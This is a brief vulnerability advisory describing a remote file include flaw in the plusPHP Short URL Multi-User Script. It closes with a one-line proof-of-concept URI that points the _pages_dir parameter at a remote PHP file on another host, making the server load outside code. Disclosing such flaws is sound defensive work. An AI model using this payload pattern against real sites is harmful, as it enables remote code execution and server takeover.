plusPHP Short URL Multi-User Script Remote File Include Vulnerability

plusPHP Short URL Multi-User Script Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/plus.php?_pages_dir=http://www.example2.com/s.php